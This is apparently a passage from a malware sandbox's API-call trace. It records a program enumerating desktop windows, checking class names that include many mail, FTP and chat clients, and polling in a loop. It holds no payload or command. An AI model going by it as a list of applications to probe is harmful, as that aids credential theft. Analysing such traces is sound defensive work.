lpClassName="thunderbirdwin") returned 14 [0289.767] GetClassNameA (in: hWnd=0x10326, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="whatsapp_class") returned 14 [0289.767] GetClassNameA (in: hWnd=0x1031e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="trillianwnd") returned 11 [0289.767] GetClassNameA (in: hWnd=0x102fe, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="scriptftpwnd") returned 12 [0289.767] GetClassNameA (in: hWnd=0x10320, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="webdrive_cls") returned 12 [0289.767] GetClassNameA (in: hWnd=0x102fa, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="pidgin_cls") returned 10 [0289.768] GetClassNameA (in: hWnd=0x10308, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="skype_wnd") returned 9 [0289.768] GetClassNameA (in: hWnd=0x102fc, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="outlookwindow") returned 13 [0289.768] GetClassNameA (in: hWnd=0x102f0, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="operamail_") returned 10 [0289.768] GetClassNameA (in: hWnd=0x102ea, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="ncftp_wnd") returned 9 [0289.768] GetClassNameA (in: hWnd=0x102e8, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="notepad") returned 7 [0289.768] GetClassNameA (in: hWnd=0x102e4, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="leechftp_wnd") returned 12 [0289.768] GetClassNameA (in: hWnd=0x102da, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="icq_app") returned 7 [0289.768] GetClassNameA (in: hWnd=0x102e0, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="gmailnotifierproapp") returned 19 [0289.768] GetClassNameA (in: hWnd=0x102de, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="foxmailincmail_") returned 15 [0289.768] GetClassNameA (in: hWnd=0x102c2, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="flashfxpcls") returned 11 [0289.768] GetClassNameA (in: hWnd=0x102c0, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="filezillaapp") returned 12 [0289.768] GetClassNameA (in: hWnd=0x102be, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="fling_window") returned 12 [0289.768] GetClassNameA (in: hWnd=0x102bc, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="coreftp") returned 7 [0289.768] GetClassNameA (in: hWnd=0x102ba, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="farapp") returned 6 [0289.768] GetClassNameA (in: hWnd=0x102a4, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="barcawindow") returned 11 [0289.768] GetClassNameA (in: hWnd=0x102ac, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="bitkinexwin") returned 11 [0289.768] GetClassNameA (in: hWnd=0x102a6, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="absolutetelnet_class") returned 20 [0289.768] GetClassNameA (in: hWnd=0x102a0, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="alftpwindow") returned 11 [0289.768] GetClassNameA (in: hWnd=0x10298, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="3dftp_class") returned 11 [0289.769] GetClassNameA (in: hWnd=0x10286, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="URL Moniker Notification Window") returned 31 [0289.769] GetClassNameA (in: hWnd=0x1026a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="whose_class") returned 11 [0289.769] GetClassNameA (in: hWnd=0x10266, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="HairFriendwillwin") returned 17 [0289.769] GetClassNameA (in: hWnd=0x10260, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="involve") returned 7 [0289.769] GetClassNameA (in: hWnd=0x10262, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="religious_Free_Generation_win") returned 29 [0289.769] GetClassNameA (in: hWnd=0x1025a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="Magazine_official_teach_") returned 24 [0289.769] GetClassNameA (in: hWnd=0x10258, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="SmallMoneywin") returned 13 [0289.769] GetClassNameA (in: hWnd=0x10234, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="fearFewwin") returned 10 [0289.769] GetClassNameA (in: hWnd=0x10250, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="Common_trade_Station_wnd") returned 24 [0289.769] GetClassNameA (in: hWnd=0x1023e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="take_whether_cls") returned 16 [0289.769] GetClassNameA (in: hWnd=0x10240, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="bag_begin_Gas_window") returned 20 [0289.769] GetClassNameA (in: hWnd=0x10232, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="charge_Model_Ready_app") returned 22 [0289.769] GetClassNameA (in: hWnd=0x1021a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="degree_sing_Pretty_") returned 19 [0289.769] GetClassNameA (in: hWnd=0x1022e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="light_Where_app") returned 15 [0289.769] GetClassNameA (in: hWnd=0x10228, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="Real_New_window") returned 15 [0289.769] GetClassNameA (in: hWnd=0x10226, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="work_Heavy_win") returned 14 [0289.769] GetClassNameA (in: hWnd=0x10224, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="Letter_") returned 7 [0289.769] GetClassNameA (in: hWnd=0x10222, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="memberclass") returned 11 [0289.769] GetClassNameA (in: hWnd=0x10210, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="Alternate Owner") returned 15 [0289.769] GetClassNameA (in: hWnd=0x10206, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0289.770] GetClassNameA (in: hWnd=0x10200, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0289.770] GetClassNameA (in: hWnd=0x101f2, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0289.770] GetClassNameA (in: hWnd=0x401dc, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0289.770] GetClassNameA (in: hWnd=0x2015e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0289.770] GetClassNameA (in: hWnd=0x2013a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IEFrame") returned 7 [0289.770] GetClassNameA (in: hWnd=0x101e4, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0289.770] GetClassNameA (in: hWnd=0x30042, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0289.770] GetClassNameA (in: hWnd=0x2013e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="DDEMLEvent") returned 10 [0289.770] GetClassNameA (in: hWnd=0x2013c, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="DDEMLMom") returned 8 [0289.770] GetClassNameA (in: hWnd=0x20138, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0289.770] GetClassNameA (in: hWnd=0x20148, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0289.770] GetClassNameA (in: hWnd=0x10236, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="URL Moniker Notification Window") returned 31 [0289.770] GetClassNameA (in: hWnd=0x101ca, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="ATL:00007FFA08097080") returned 20 [0289.770] GetClassNameA (in: hWnd=0x101be, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0289.770] GetClassNameA (in: hWnd=0x101b0, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="SystemTray_Main") returned 15 [0289.770] GetClassNameA (in: hWnd=0x101ac, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0289.770] GetClassNameA (in: hWnd=0x101aa, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0289.770] GetClassNameA (in: hWnd=0x10126, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0289.771] GetClassNameA (in: hWnd=0x1012e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="TabletModeCoverWindow") returned 21 [0289.771] GetClassNameA (in: hWnd=0x101a0, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0289.771] GetClassNameA (in: hWnd=0x101a2, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0289.771] GetClassNameA (in: hWnd=0x1012c, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="DummyDWMListenerWindow") returned 22 [0289.771] GetClassNameA (in: hWnd=0x10124, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputTopWndClass") returned 22 [0289.771] GetClassNameA (in: hWnd=0x1010a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="PushNotificationsPowerManagement") returned 32 [0289.771] GetClassNameA (in: hWnd=0x10108, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0289.771] GetClassNameA (in: hWnd=0x10100, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="ApplicationManager_DesktopShellWindow") returned 37 [0289.771] GetClassNameA (in: hWnd=0x100fc, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0289.771] GetClassNameA (in: hWnd=0x100f6, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0289.771] GetClassNameA (in: hWnd=0x100f4, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0289.771] GetClassNameA (in: hWnd=0x200e0, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0289.771] GetClassNameA (in: hWnd=0x100ce, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0289.771] GetClassNameA (in: hWnd=0x2001e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="MS_WebcheckMonitor") returned 18 [0289.771] GetClassNameA (in: hWnd=0x20034, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="BluetoothNotificationAreaIconWindowClass") returned 40 [0289.771] GetClassNameA (in: hWnd=0x20036, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0289.771] GetClassNameA (in: hWnd=0x2004c, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="PNIHiddenWnd") returned 12 [0289.771] GetClassNameA (in: hWnd=0x101d4, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0289.771] GetClassNameA (in: hWnd=0x200f2, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0289.771] GetClassNameA (in: hWnd=0x200ee, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0289.772] GetClassNameA (in: hWnd=0x100ba, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="NotifyIconOverflowWindow") returned 24 [0289.772] GetClassNameA (in: hWnd=0x2007c, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0289.772] GetClassNameA (in: hWnd=0x20072, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="DDEMLEvent") returned 10 [0289.772] GetClassNameA (in: hWnd=0x4006e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="DDEMLMom") returned 8 [0289.772] GetClassNameA (in: hWnd=0x10024, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="Dwm") returned 3 [0289.772] GetClassNameA (in: hWnd=0x10180, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="CicLoaderWndClass") returned 17 [0289.772] GetClassNameA (in: hWnd=0x1036a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="Internet Explorer_Hidden") returned 24 [0289.772] GetClassNameA (in: hWnd=0x100de, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="Progman") returned 7 [0289.772] GetClassNameA (in: hWnd=0x1014c, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.772] GetClassNameA (in: hWnd=0x1017a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.772] GetClassNameA (in: hWnd=0x1016c, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.772] GetClassNameA (in: hWnd=0x1015c, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.772] GetClassNameA (in: hWnd=0x10190, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.772] GetClassNameA (in: hWnd=0x100dc, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0289.772] GetClassNameA (in: hWnd=0x1008e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.772] GetClassNameA (in: hWnd=0x603aa, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.772] GetClassNameA (in: hWnd=0x103b6, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.772] GetClassNameA (in: hWnd=0x103b4, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.772] GetClassNameA (in: hWnd=0x103b2, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.772] GetClassNameA (in: hWnd=0x103b0, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.772] GetClassNameA (in: hWnd=0x103ae, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.773] GetClassNameA (in: hWnd=0x10390, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.773] GetClassNameA (in: hWnd=0x1038e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.773] GetClassNameA (in: hWnd=0x1038c, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.773] GetClassNameA (in: hWnd=0x1038a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.773] GetClassNameA (in: hWnd=0x10388, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.773] GetClassNameA (in: hWnd=0x2023c, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.773] GetClassNameA (in: hWnd=0x10382, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.773] GetClassNameA (in: hWnd=0x1037a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.773] GetClassNameA (in: hWnd=0x10378, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.773] GetClassNameA (in: hWnd=0x10376, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.773] GetClassNameA (in: hWnd=0x301de, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.773] GetClassNameA (in: hWnd=0x10356, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.773] GetClassNameA (in: hWnd=0x10354, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.773] GetClassNameA (in: hWnd=0x10348, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.773] GetClassNameA (in: hWnd=0x10346, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.773] GetClassNameA (in: hWnd=0x10344, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.773] GetClassNameA (in: hWnd=0x10342, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.773] GetClassNameA (in: hWnd=0x10340, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.773] GetClassNameA (in: hWnd=0x1033e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.773] GetClassNameA (in: hWnd=0x1033c, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.773] GetClassNameA (in: hWnd=0x1033a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.774] GetClassNameA (in: hWnd=0x10338, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.774] GetClassNameA (in: hWnd=0x10336, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.774] GetClassNameA (in: hWnd=0x2023a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.774] GetClassNameA (in: hWnd=0x1032e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.774] GetClassNameA (in: hWnd=0x10322, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.774] GetClassNameA (in: hWnd=0x10316, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.774] GetClassNameA (in: hWnd=0x10314, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.774] GetClassNameA (in: hWnd=0x1030a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.774] GetClassNameA (in: hWnd=0x10302, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.774] GetClassNameA (in: hWnd=0x10300, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.774] GetClassNameA (in: hWnd=0x102f8, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.774] GetClassNameA (in: hWnd=0x102f2, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.774] GetClassNameA (in: hWnd=0x102d0, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.774] GetClassNameA (in: hWnd=0x102ce, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.774] GetClassNameA (in: hWnd=0x102cc, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.774] GetClassNameA (in: hWnd=0x102ca, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.774] GetClassNameA (in: hWnd=0x102c8, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.774] GetClassNameA (in: hWnd=0x102c6, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.774] GetClassNameA (in: hWnd=0x102c4, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.774] GetClassNameA (in: hWnd=0x102b8, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.775] GetClassNameA (in: hWnd=0x102b6, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.775] GetClassNameA (in: hWnd=0x20230, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.775] GetClassNameA (in: hWnd=0x1027e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.775] GetClassNameA (in: hWnd=0x1027c, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.775] GetClassNameA (in: hWnd=0x1027a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.775] GetClassNameA (in: hWnd=0x10278, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.775] GetClassNameA (in: hWnd=0x10276, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.775] GetClassNameA (in: hWnd=0x10274, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.775] GetClassNameA (in: hWnd=0x10272, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.775] GetClassNameA (in: hWnd=0x20218, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.775] GetClassNameA (in: hWnd=0x1026e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.775] GetClassNameA (in: hWnd=0x1026c, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.775] GetClassNameA (in: hWnd=0x1025e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.775] GetClassNameA (in: hWnd=0x10256, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.775] GetClassNameA (in: hWnd=0x1024a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.775] GetClassNameA (in: hWnd=0x10248, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.775] GetClassNameA (in: hWnd=0x10246, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.775] GetClassNameA (in: hWnd=0x10244, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.775] GetClassNameA (in: hWnd=0x10242, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.775] GetClassNameA (in: hWnd=0x10212, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.775] GetClassNameA (in: hWnd=0x10208, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.776] GetClassNameA (in: hWnd=0x40016, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.776] GetClassNameA (in: hWnd=0x10238, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.776] GetClassNameA (in: hWnd=0x101cc, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.778] GetClassNameA (in: hWnd=0x101ae, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.778] GetClassNameA (in: hWnd=0x1010c, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.778] GetClassNameA (in: hWnd=0x100fe, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.778] GetClassNameA (in: hWnd=0x100f8, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0289.778] GetClassNameA (in: hWnd=0x100ea, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.778] GetClassNameA (in: hWnd=0x20032, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.779] GetClassNameA (in: hWnd=0x2019e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.779] GetClassNameA (in: hWnd=0x1007e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.779] GetClassNameA (in: hWnd=0x20074, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0289.779] Sleep (dwMilliseconds=0x64) [0289.877] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0289.877] GetClassNameA (in: hWnd=0x100ec, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="Worker Window") returned 13 [0289.877] GetClassNameA (in: hWnd=0x1014a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="ForegroundStaging") returned 17 [0289.877] GetClassNameA (in: hWnd=0x1010e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="ForegroundStaging") returned 17 [0289.878] GetClassNameA (in: hWnd=0x1011c, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0289.878] GetClassNameA (in: hWnd=0x10120, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0289.878] GetClassNameA (in: hWnd=0x10122, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0289.878] GetClassNameA (in: hWnd=0x1011e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0289.878] GetClassNameA (in: hWnd=0x1011a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0289.878] GetClassNameA (in: hWnd=0x10118, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputTopWndClass") returned 22 [0289.878] GetClassNameA (in: hWnd=0x10116, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0289.878] GetClassNameA (in: hWnd=0x10114, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0289.878] Sleep (dwMilliseconds=0x64) [0289.950] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0289.951] Sleep (dwMilliseconds=0x64) [0290.022] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0290.022] Sleep (dwMilliseconds=0x64) [0290.049] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0290.049] Sleep (dwMilliseconds=0x64) [0290.063] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0290.064] Sleep (dwMilliseconds=0x64) [0290.092] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0290.093] Sleep (dwMilliseconds=0x64) [0290.140] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0290.140] Sleep (dwMilliseconds=0x64) [0290.208] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0290.208] Sleep (dwMilliseconds=0x64) [0290.264] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0290.264] Sleep (dwMilliseconds=0x64) [0290.404] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0290.405] Sleep (dwMilliseconds=0x64) [0290.547] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0290.547] Sleep (dwMilliseconds=0x64) [0290.608] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0290.609] Sleep (dwMilliseconds=0x64) [0290.676] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0290.677] Sleep (dwMilliseconds=0x64) [0290.726] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0290.726] Sleep (dwMilliseconds=0x64) [0290.731] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0290.732] Sleep (dwMilliseconds=0x64) [0290.779] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0290.780] Sleep (dwMilliseconds=0x64) [0290.883] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0290.884] Sleep (dwMilliseconds=0x64) [0290.933] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0290.936] Sleep (dwMilliseconds=0x64) [0291.046] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0291.047] Sleep (dwMilliseconds=0x64) [0291.139] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0291.139] Sleep (dwMilliseconds=0x64) [0291.356] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0291.356] Sleep (dwMilliseconds=0x64) [0291.573] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0291.574] Sleep (dwMilliseconds=0x64) [0291.818] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0291.819] Sleep (dwMilliseconds=0x64) [0291.932] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0291.933] Sleep (dwMilliseconds=0x64) [0292.034] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0292.034] Sleep (dwMilliseconds=0x64) [0292.082] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0292.083] Sleep (dwMilliseconds=0x64) [0292.149] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0292.154] Sleep (dwMilliseconds=0x64) [0292.222] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) 